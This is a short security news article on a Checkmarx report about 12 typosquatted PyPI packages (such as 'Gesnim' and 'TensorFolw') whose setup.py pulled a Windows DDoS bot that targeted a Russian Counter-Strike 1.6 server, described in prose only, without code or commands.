Malicious PyPi Packages Used for DDoS Attacks on Counter-Strike Servers
Security analysts from Checkmarx have discovered a new wave of malware in the PyPi repository. This time, the malicious packages are somewhat unusual: instead of stealing credentials or environment variables, they are designed to attack Counter-Strike servers.
The researchers found 12 malicious packages uploaded to PyPi by a user named devfather777. The attacker used typosquatting to spread these packages, meaning they were uploaded with names similar to popular packages, hoping developers would accidentally install them due to a typo (which is common when installing packages via the terminal). For example, Gesnim instead of Gensim, or TensorFolw instead of TensorFlow.
List of Malicious Libraries
- Gesnim
- Kears
- TensorFolw
- Seabron
- tqmd
- lxlm
- mokc
- ipaddres
- ipdress
- Fflsk
- douctils
- inda
Once installed, all the packages behaved the same way: code embedded in setup.py would run to check if the host was a Windows system. If so, it would download a payload called test.exe from GitHub. Notably, only 11 out of 69 antivirus engines on VirusTotal flagged this file as malicious, since it is a relatively new and stealthy malware written in C++.
After installation, the malware would persist on the system by adding itself to startup and installing a system-wide root certificate with an expired date. Once set up, it would connect to a hardcoded URL to fetch its configuration. If it failed to connect after three attempts, it would try to get responses from DGA-generated addresses via HTTP requests.
Researchers observed that after receiving its configuration, the malware would turn the infected host into a DDoS bot, which then began attacking a Russian Counter-Strike 1.6 server. It appears the operatorβs goal was to take down a specific Counter-Strike server by infecting enough devices to overwhelm it with traffic.
Currently, the GitHub repository used to host the malware has been taken down. However, experts warn that the attacker could easily resume their campaign by abusing another file-sharing service.